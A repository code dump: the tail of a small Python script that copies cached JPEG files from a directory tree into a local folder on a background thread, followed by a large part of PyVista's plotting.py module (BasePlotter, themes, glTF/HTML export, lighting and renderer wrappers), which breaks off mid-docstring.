shutil.copy(file,os.path.join(base_dir,simplename[0:-3]+suffix)) #remove cache auto added [1]
def get_cachefile(name,newpath):
for i in range(6): #max try times
flag=False
for parent,dirnames,filenames in os.walk(rootdir):
for file in filenames:
if fnmatch.fnmatch(file,name): #common match
copy_file(os.path.join(parent,file),newpath)
flag=True
if flag:
print("grab files successed.")
return
sleep(30) #延时
print("grab files failed.")
from threading import Thread
#grab files
def grab_file(name,newpath):
simplename,suffix=os.path.splitext(name)
get_file=Thread(target=get_cachefile,args=(simplename+'*'+suffix,newpath))#parameter transin
get_file.start() #异步抓取
if __name__ =='__main__':
grab_file("*.jpg","tmp_jpgs")
|
plotting.py
|
"""PyVista plotting module."""
import collections.abc
import ctypes
from functools import wraps
import io
import logging
import os
import pathlib
import platform
import textwrap
from threading import Thread
import time
from typing import Dict
import warnings
import weakref
import numpy as np
import scooby
import pyvista
from pyvista import _vtk
from pyvista.utilities import (
abstract_class,
assert_empty_kwargs,
convert_array,
get_array,
is_pyvista_dataset,
numpy_to_texture,
raise_not_matching,
wrap,
)
from ..utilities.misc import PyvistaDeprecationWarning
from ..utilities.regression import image_from_window
from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .render_window_interactor import RenderWindowInteractor
from .renderer import Camera, Renderer
from .renderers import Renderers
from .scalar_bars import ScalarBars
from .tools import FONTS, opacity_transfer_function, parse_color, parse_font_family
from .widgets import WidgetHelper
SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
VERY_FIRST_RENDER = True # windows plotter helper
# EXPERIMENTAL: permit pyvista to kill the render window
KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY')
if KILL_DISPLAY: # pragma: no cover
# this won't work under wayland
try:
X11 = ctypes.CDLL("libX11.so")
X11.XCloseDisplay.argtypes = [ctypes.c_void_p]
except OSError:
warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\n'
'Probably using wayland')
KILL_DISPLAY = False
def close_all():
"""Close all open/active plotters and clean up memory.
Returns
-------
bool
``True`` when all plotters have been closed.
"""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
def _warn_xserver(): # pragma: no cover
"""Check if plotting is supported and persist this state.
Check once and cache this value between calls. Warn the user if
plotting is not supported. Configured to check on Linux and Mac
OS since the Windows check is not quick.
"""
# disable windows check until we can get a fast way of verifying
# if windows has a windows manager (which it generally does)
if os.name == 'nt':
return
if not hasattr(_warn_xserver, 'has_support'):
_warn_xserver.has_support = pyvista.system_supports_plotting()
if not _warn_xserver.has_support:
# check if a display has been set
if 'DISPLAY' in os.environ:
return
# finally, check if using a backend that doesn't require an xserver
if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']:
return
# Check if VTK has EGL support
ren_win_str = str(type(_vtk.vtkRenderWindow()))
if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str:
return
warnings.warn('\n'
'This system does not appear to be running an xserver.\n'
'PyVista will likely segfault when rendering.\n\n'
'Try starting a virtual frame buffer with xvfb, or using\n '
' ``pyvista.start_xvfb()``\n')
USE_SCALAR_BAR_ARGS = """
"stitle" is a depreciated keyword and will be removed in a future
release.
Use ``scalar_bar_args`` instead. For example:
scalar_bar_args={'title': 'Scalar Bar Title'}
"""
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : str or sequence, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Window title of the scalar bar
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a Light Kit (to be precise, 5 separate lights
that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
"""
mouse_position = None
click_position = None
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None,
groups=None, row_weights=None, col_weights=None,
lighting='light kit', theme=None):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self._theme = pyvista.themes.DefaultTheme()
if theme is None:
# copy global theme to ensure local plot theme is fixed
# after creation.
self._theme.load_theme(pyvista.global_theme)
else:
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError('Expected ``pyvista.themes.DefaultTheme`` for '
f'``theme``, not {type(theme).__name__}.')
self._theme.load_theme(theme)
self.image_transparent_background = self._theme.transparent_background
# optional function to be called prior to closing
self.__before_close_callback = None
self._store_image = False
self.mesh = None
if title is None:
title = self._theme.title
self.title = str(title)
# add renderers
self.renderers = Renderers(self, shape, splitting_position, row_weights,
col_weights, groups, border, border_color,
border_width)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bars = ScalarBars(self)
# track if the camera has been setup
self._first_time = True
# Keep track of the scale
# track if render window has ever been rendered
self._rendered = False
# this helps managing closed plotters
self._closed = False
# lighting style; be forgiving with input (accept underscores
# and ignore case)
lighting_normalized = str(lighting).replace('_', ' ').lower()
if lighting_normalized == 'light kit':
self.enable_lightkit()
elif lighting_normalized == 'three lights':
self.enable_3_lights()
elif lighting_normalized != 'none':
raise ValueError(f'Invalid lighting option "{lighting}".')
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
self._image_depth_null = None
self.last_image_depth = None
self.last_image = None
self._has_background_layer = False
# set hidden line removal based on theme
if self.theme.hidden_line_removal:
self.enable_hidden_line_removal()
# set antialiasing based on theme
if self.theme.antialiasing:
self.enable_anti_aliasing()
@property
def theme(self):
"""Return or set the theme used for this plotter.
Examples
--------
Use the dark theme for a plotter.
>>> import pyvista
>>> from pyvista import themes
>>> pl = pyvista.Plotter()
>>> pl.theme = themes.DarkTheme()
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.show()
"""
return self._theme
@theme.setter
def theme(self, theme):
if not isinstance(theme, pyvista.themes.DefaultTheme):
raise TypeError('Expected a pyvista theme like '
'``pyvista.themes.DefaultTheme``, '
f'not {type(theme).__name__}.')
self._theme.load_theme(pyvista.global_theme)
def import_gltf(self, filename, set_camera=True):
"""Import a glTF file into the plotter.
See https://www.khronos.org/gltf/ for more information.
Parameters
----------
filename : str
Path to the glTF file.
set_camera : bool, optional
Set the camera viewing angle to one compatible with the
default three.js perspective (``'xy'``).
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP
>>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP
>>> pl = pyvista.Plotter() # doctest:+SKIP
>>> pl.import_gltf(helmet_file) # doctest:+SKIP
>>> pl.set_environment_texture(cubemap) # doctest:+SKIP
>>> pl.camera.zoom(1.8) # doctest:+SKIP
>>> pl.show() # doctest:+SKIP
See :ref:`load_gltf` for a full example using this method.
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'Unable to locate {filename}')
# lazy import here to avoid importing unused modules
from vtkmodules.vtkIOImport import vtkGLTFImporter
importer = vtkGLTFImporter()
importer.SetFileName(filename)
importer.SetRenderWindow(self.ren_win)
importer.Update()
# register last actor in actors
actor = self.renderer.GetActors().GetLastItem()
name = actor.GetAddressAsString("")
self.renderer._actors[name] = actor
# set camera position to a three.js viewing perspective
if set_camera:
self.camera_position = 'xy'
def export_html(self, filename):
"""Export this plotter as an interactive scene to a HTML file.
Parameters
----------
filename : str
Path to export the html file to.
Notes
-----
You will need ``ipywidgets`` and ``pythreejs`` installed for
this feature.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_uniform()
>>> pl = pyvista.Plotter(shape=(1,2))
>>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True)
>>> pl.subplot(0,1)
>>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True)
>>> pl.export_html('pyvista.html') # doctest:+SKIP
"""
pythreejs_renderer = self.to_pythreejs()
# import after converting as we check for pythreejs import first
try:
from ipywidgets.embed import embed_minimal_html
except ImportError: # pragma: no cover
raise ImportError('Please install ipywidgets with:\n'
'\n\tpip install ipywidgets')
# convert and write to file
embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title)
def to_pythreejs(self):
"""Convert this plotting scene to a pythreejs renderer.
Returns
-------
ipywidgets.Widget
Widget containing pythreejs renderer.
"""
self._on_first_render_request() # setup camera
from pyvista.jupyter.pv_pythreejs import convert_plotter
return convert_plotter(self)
def export_gltf(self, filename, inline_data=True, rotate_scene=True,
save_normals=True):
"""Export the current rendering scene as a glTF file.
Visit https://gltf-viewer.donmccurdy.com/ for an online viewer.
See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html
for limitations regarding the exporter.
Parameters
----------
filename : str
Path to export the gltf file to.
inline_data : bool, optional
Sets if the binary data be included in the json file as a
base64 string. When ``True``, only one file is exported.
rotate_scene : bool, optional
Rotate scene to be compatible with the glTF specifications.
save_normals : bool, optional
Saves the point array ``'Normals'`` as ``'NORMALS'`` in
the outputted scene.
Examples
--------
Output a simple point cloud represented as balls.
>>> import numpy as np
>>> import pyvista
>>> point_cloud = np.random.random((100, 3))
>>> pdata = pyvista.PolyData(point_cloud)
>>> pdata['orig_sphere'] = np.arange(100)
>>> sphere = pyvista.Sphere(radius=0.02)
>>> pc = pdata.glyph(scale=False, geom=sphere)
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True,
... show_scalar_bar=False)
>>> pl.export_gltf('balls.gltf') # doctest:+SKIP
>>> pl.show()
Output the orientation plotter.
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP
>>> pl.show()
"""
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Support for glTF requires VTK v9 or newer')
if not hasattr(self, "ren_win"):
raise RuntimeError('This plotter has been closed and is unable to export '
'the scene.')
from vtkmodules.vtkIOExport import vtkGLTFExporter
# rotate scene to gltf compatible view
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateX(-90)
actor.RotateZ(-90)
if save_normals:
try:
mapper = actor.GetMapper()
if mapper is None:
continue
dataset = mapper.GetInputAsDataSet()
if 'Normals' in dataset.point_data:
# ensure normals are active
normals = dataset.point_data['Normals']
dataset.point_data.active_normals = normals.copy()
except:
pass
exporter = vtkGLTFExporter()
exporter.SetRenderWindow(self.ren_win)
exporter.SetFileName(filename)
exporter.SetInlineData(inline_data)
exporter.SetSaveNormal(save_normals)
exporter.Update()
# rotate back if applicable
if rotate_scene:
for renderer in self.renderers:
for actor in renderer.actors.values():
if hasattr(actor, 'RotateX'):
actor.RotateZ(90)
actor.RotateX(90)
def enable_hidden_line_removal(self, all_renderers=True):
"""Enable hidden line removal.
Wireframe geometry will be drawn using hidden line removal if
the rendering engine supports it.
Disable this with :func:`disable_hidden_line_removal
<BasePlotter.disable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Create a side-by-side plotter and render a sphere in wireframe
with hidden line removal enabled on the left and disabled on
the right.
>>> import pyvista
>>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20)
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("With hidden line removal")
>>> pl.enable_hidden_line_removal(all_renderers=False)
>>> pl.subplot(0, 1)
>>> pl.disable_hidden_line_removal(all_renderers=False)
>>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe')
>>> _ = pl.add_text("Without hidden line removal")
>>> pl.show()
"""
if all_renderers:
for renderer in self.renderers:
renderer.enable_hidden_line_removal()
else:
self.renderer.enable_hidden_line_removal()
def disable_hidden_line_removal(self, all_renderers=True):
"""Disable hidden line removal.
Enable again with :func:`enable_hidden_line_removal
<BasePlotter.enable_hidden_line_removal>`
Parameters
----------
all_renderers : bool
If ``True``, applies to all renderers in subplots. If
``False``, then only applies to the active renderer.
Examples
--------
Enable and then disable hidden line removal.
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.enable_hidden_line_removal()
>>> pl.disable_hidden_line_removal()
"""
if all_renderers:
for renderer in self.renderers:
renderer.disable_hidden_line_removal()
else:
self.renderer.disable_hidden_line_removal()
@property
def scalar_bar(self):
"""First scalar bar. Kept for backwards compatibility."""
return list(self.scalar_bars.values())[0]
@property
def scalar_bars(self):
"""Scalar bars.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> sphere['Data'] = sphere.points[:, 2]
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> plotter.scalar_bars
Scalar Bar Title Interactive
"Data" False
Select a scalar bar actor based on the title of the bar.
>>> plotter.scalar_bars['Data'] # doctest:+SKIP
(vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00
"""
return self._scalar_bars
@property
def _before_close_callback(self):
"""Return the cached function (expecting a reference)."""
if self.__before_close_callback is not None:
return self.__before_close_callback()
@_before_close_callback.setter
def _before_close_callback(self, func):
"""Store a weakref.ref of the function being called."""
if func is not None:
self.__before_close_callback = weakref.ref(func)
else:
self.__before_close_callback = None
@property
def shape(self):
"""Shape of the plotter.
Examples
--------
Return the plotter shape.
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> plotter.shape
(2, 2)
"""
return self.renderers._shape
@property
def renderer(self):
"""Return the active renderer.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.renderer # doctest:+SKIP
(Renderer)0x7f916129bfa0
"""
return self.renderers.active_renderer
@property
def store_image(self):
"""Store last rendered frame on close.
This is normally disabled to avoid caching the image, and is
enabled by default by setting:
``pyvista.BUILDING_GALLERY = True``
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter(off_screen=True)
>>> pl.store_image = True
>>> _ = pl.add_mesh(pyvista.Cube())
>>> pl.show()
>>> image = pl.last_image
>>> type(image) # doctest:+SKIP
<class 'numpy.ndarray'>
"""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
Examples
--------
Create a 2 wide plot and set the background of right-hand plot
to orange. Add a cube to the left plot and a sphere to the
right.
>>> import pyvista
>>> pl = pyvista.Plotter(shape=(1, 2))
>>> actor = pl.add_mesh(pyvista.Cube())
>>> pl.subplot(0, 1)
>>> actor = pl.add_mesh(pyvista.Sphere())
>>> pl.set_background('orange', all_renderers=False)
>>> pl.show()
"""
self.renderers.set_active_renderer(index_row, index_column)
@wraps(Renderer.add_legend)
def add_legend(self, *args, **kwargs):
"""Wrap ``Renderer.add_legend``."""
return self.renderer.add_legend(*args, **kwargs)
@wraps(Renderer.remove_legend)
def remove_legend(self, *args, **kwargs):
"""Wrap ``Renderer.remove_legend``."""
return self.renderer.remove_legend(*args, **kwargs)
@property
def legend(self):
"""Legend actor.
There can only be one legend actor per renderer. If
``legend`` is ``None``, there is no legend actor.
"""
return self.renderer.legend
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self, only_active=False):
"""Enable 3-lights illumination.
This will replace all pre-existing lights in the scene.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default
is that every renderer is affected.
Examples
--------
>>> from pyvista import demos
>>> pl = demos.orientation_plotter()
>>> pl.enable_3_lights()
>>> pl.show()
Note how this varies from the default plotting.
>>> pl = demos.orientation_plotter()
>>> pl.show()
"""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
# Inspired from Mayavi's version of Raymond Maple 3-lights illumination
intensities = [1, 0.6, 0.5]
all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)]
for intensity, angles in zip(intensities, all_angles):
light = pyvista.Light(light_type='camera light')
light.intensity = intensity
light.position = _to_pos(*angles)
for renderer in renderers:
renderer.add_light(light)
def disable_3_lights(self):
"""Please use ``enable_lightkit``, this method has been depreciated."""
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``')
def enable_lightkit(self, only_active=False):
"""Enable the default light-kit lighting.
See:
https://www.researchgate.net/publication/2926068
This will replace all pre-existing lights in the renderer.
Parameters
----------
only_active : bool
If ``True``, only change the active renderer. The default is that
every renderer is affected.
Examples
--------
Create a plotter without any lights and then enable the
default light kit.
>>> import pyvista
>>> pl = pyvista.Plotter(lighting=None)
>>> pl.enable_lightkit()
>>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True)
>>> pl.show()
"""
renderers = [self.renderer] if only_active else self.renderers
light_kit = _vtk.vtkLightKit()
for renderer in renderers:
renderer.remove_all_lights()
# Use the renderer as a vtkLightKit parser.
# Feed it the LightKit, pop off the vtkLights, put back
# pyvista Lights. This is the price we must pay for using
# inheritance rather than composition.
light_kit.AddLightsToRenderer(renderer)
vtk_lights = renderer.lights
renderer.remove_all_lights()
for vtk_light in vtk_lights:
light = pyvista.Light.from_vtk(vtk_light)
renderer.add_light(light)
renderer.LightFollowCameraOn()
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
for renderer in self.renderers:
renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
log.debug('set_focus: %s, %s', str(args), str(kwargs))
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_chart)
def add_chart(self, *args, **kwargs):
"""Wrap ``Renderer.add_chart``."""
return self.renderer.add_chart(*args, **kwargs)
@wraps(Renderer.remove_chart)
def remove_chart(self, *args, **kwargs):
"""Wrap ``Renderer.remove_chart``."""
return self.renderer.remove_chart(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.enable_shadows)
def enable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.enable_shadows``."""
return self.renderer.enable_shadows(*args, **kwargs)
@wraps(Renderer.disable_shadows)
def disable_shadows(self, *args, **kwargs):
"""Wrap ``Renderer.disable_shadows``."""
return self.renderer.disable_shadows(*args, **kwargs)
@property
def parallel_projection(self):
"""Return parallel projection state of active render window."""
return self.renderer.parallel_projection
@parallel_projection.setter
def parallel_projection(self, state):
"""Set parallel projection state of all active render windows."""
self.renderer.parallel_projection = state
@property
def parallel_scale(self):
"""Return parallel scale of active render window."""
return self.renderer.parallel_scale
@parallel_scale.setter
def parallel_scale(self, value):
"""Set parallel scale of all active render windows."""
self.renderer.parallel_scale = value
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, *args, **kwargs):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(*args, **kwargs)
return True
@wraps(Renderer.set_environment_texture)
def set_environment_texture(self, *args, **kwargs):
"""Wrap ``Renderer.set_environment_texture``."""
return self.renderer.set_environment_texture(*args, **kwargs)
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
if not self.camera_set:
self.camera_position = self.get_default_cam_pos()
self.reset_camera()
self.camera_set = True
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the active render window."""
return self.renderers.active_renderer.GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
@property
def window_size(self):
"""Return the render window size in ``(width, height)``.
Examples
--------
Change the window size from ``200 x 200`` to ``400 x 400``.
>>> import pyvista
>>> pl = pyvista.Plotter(window_size=[200, 200])
>>> pl.window_size
[200, 200]
>>> pl.window_size = [400, 400]
>>> pl.window_size
[400, 400]
"""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
def _check_rendered(self):
"""Check if the render window has been shown and raise an exception if not."""
if not self._rendered:
raise AttributeError('\nThis plotter has not yet been setup and rendered '
'with ``show()``.\n'
'Consider setting ``off_screen=True`` '
'for off screen rendering.\n')
def _check_has_ren_win(self):
"""Check if render window attribute exists and raise an exception if not."""
if not hasattr(self, 'ren_win'):
raise AttributeError('\n\nTo retrieve an image after the render window '
'has been closed, set:\n\n'
' ``plotter.store_image = True``\n\n'
'before closing the plotter.')
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
